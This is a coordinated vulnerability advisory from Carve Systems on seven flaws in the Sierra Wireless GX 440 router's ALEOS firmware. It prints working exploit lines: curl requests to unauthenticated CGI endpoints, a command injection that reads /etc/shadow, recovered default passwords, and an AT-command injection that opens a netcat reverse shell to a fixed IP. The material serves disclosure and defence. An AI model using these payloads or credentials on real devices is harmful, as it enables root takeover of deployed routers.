Sierra Wireless customers can find more details about the products affected by these issues and workarounds on the Sierra Wireless site. Customers will need to authenticate before downloading content.
Carve Systems consultants performed, and continue to perform, research on a number of IoT devices. The Carve Systems team coordiantes its disclosure with vendors when at all possible. This advisory is for the Sierra GX 440. In 2015 the consultants performed research against the GX 440 running the 4.3.2a.010 version of the firmware. The consultants discovered numerous security findings and disclosed these findings to the vendor.
This advisory covers seven CVEs (details pending):
Disclosure Timeline
- 3/11/16 – Initial contact email sent to vendor.
- 4/5/16 – Disclosure to CERT/CC (VU#829752).
- 4/7/16 – CERT/CC communicates findings to Sierra. Projected disclosure date is 5/13/16.
- 4/15/16 – CERT/CC indicates that Sierra would like to work directly with Carve. Introduction email.
- 4/15/16 to 5/3/16 – Carve communicates additional details to Sierra. Sierra and Carve work together to understand which vulnerabilities have already been patched in newer release.
- 5/11/16 – Carve/Sierra mutually agree to delay publication until 5/31/16.
- 6/9/16 – Coordinated public disclosure.
Original Advisory Content
Below is the original advisory provided to Sierra Wireless.
Affected System Configuration Sierra GX 440 in its default configuration. Affected versions: ALEOS firmware 4.3.2 - Current. Vulnerability Description This disclosure covers distinct vulnerabilities, enumerated below: 1. Command injection in management web application 2. Weak passwords are easily recovered 3. Command injection via AT interface 4. Lack of authentication in the management web application 5. Weak session tokens in management web application 6. Plaintext application password storage 7. Management web application runs as root. 1. COMMAND INJECTION IN MANAGEMENT WEB APPLICATION The management web application has a command injection vulnerability at the following URL: curl -i -s -k -X 'POST' -H 'Content-Type: text/xml; charset=UTF-8' \ --data-binary $'5025=Data To Store' \ 'http://management_server_lan_ip:9191/Embedded_Ace_Set_Task.cgi' The 5025 parameter is command injectable. Entering 5025=data;cat${IFS}/etc/shadow${IFS}>>/mnt/hda1/junxion/log/messages for the data parameter causes the system to put the contents of the shadow file into the log file, viewable in the management web application. 2. WEAK PASSWORDS ARE EASILY RECOVERED The firmware is shipped with weak default passwords. A password cracker was able to trivially recover the following passwords: admin:2222:10957:0:99999:7::: rauser:12345:15409:0:99999:7::: user:12345:13666:0::::: sconsole:12345:13666:0::::: The passwords were usable to gain root access to the system directly via telnet. 3. COMMAND INJECTION VIA AT INTERFACE The device provided an authenticated (via simple password) "Hayes AT" style command interface suffers from command injection. The AT interface, accessible via a plain text TCP client, such as netcat, socat, or telnet, can set parameters. At least one parameter was identified to be vulnerable to command injection. AT*HOSTUID=yes;sleep${IFS}120;nc${IFS}192.168.17.100:9001${IFS}-e${IFS}/bin/sh The above injection parameter launches a remote shell to the specified IP address, 192.168.17.100, in this case, upon system reboot. This enabled the researchers to gain root access to the device. This is complicated by the prevalence of devices using ALEOS that have default passwords, making it more likely an attacker can exploit this vulnerability. 4. LACK OF AUTHENTICATION IN THE MANAGEMENT WEB APPLICATION The researchers observed that raw HTTP requests to the HTTP end points responsible for setting and saving data in the management web application did not require authentication. An attacker can get or set any data parameter in the application, including the management web application password. curl -i -s -k -X 'POST' -H 'Content-Type: text/xml; charset=UTF-8' --data-binary $'5003' 'http://192.168.13.31:9191/Embedded_Ace_Get_Task.cgi' The attacker can then use COMMAND INJECTION IN MANAGEMENT WEB APPLICATION to gain privileged root/shell access to the device. 5. WEAK SESSION TOKENS IN MANAGEMENT WEB APPLICATION The application derived the session token by using a very weak permutation of the current time and the users password. The session token was trivially reversible. Additionally, the session token was stored in the URL. It used a simple integer array and basic arithmetic to "obfuscate" the password using JavaScript. This "session token" is all that was required to access the management web application. 6. PLAINTEXT APPLICATION PASSWORD STORAGE The device stored the management web application password in plain text on flash storage. 7. MANAGEMENT WEB APPLICATION RUNS AS ROOT The management web application runs as root. Best practice dictates daemons execute following the principle of least privilege. In this case the command injection from issue 1. COMMAND INJECTION IN MANAGEMENT WEB APPLICATION allows for much easier compromise of the device as a whole. Sierra devices, by default, do not expose the administrative web application. However, if these administrative web applications are ever exposed this issue makes it much easier for an attacker to completely compromise the device in conjunction with other vulnerabilities. How was this vulnerability found These vulnerabilities were discovered using standard reverse engineering and penetration tools: - HTTP MiTM Proxies - Hex editors - ARM Disassemblers - Text editors - Texas Instruments TI-89 Graphing Calculator Vulnerability impact Although these vulnerabilities were discovered on a specific device, the Sierra GX 440, the vulnerabilities are generally applicable to the ALEOS platform, which is in very wide deployment on numerous Sierra devices. 1. A malicious attacker can use these vulnerabilities to freely gain root access to devices they control. 2. An attacker can use some of these vulnerabilities to compromise and gain root access devices with weak or default configuration. 3. An attacker can easily compromise devices it has local, but non-physical access using these vulnerabilities.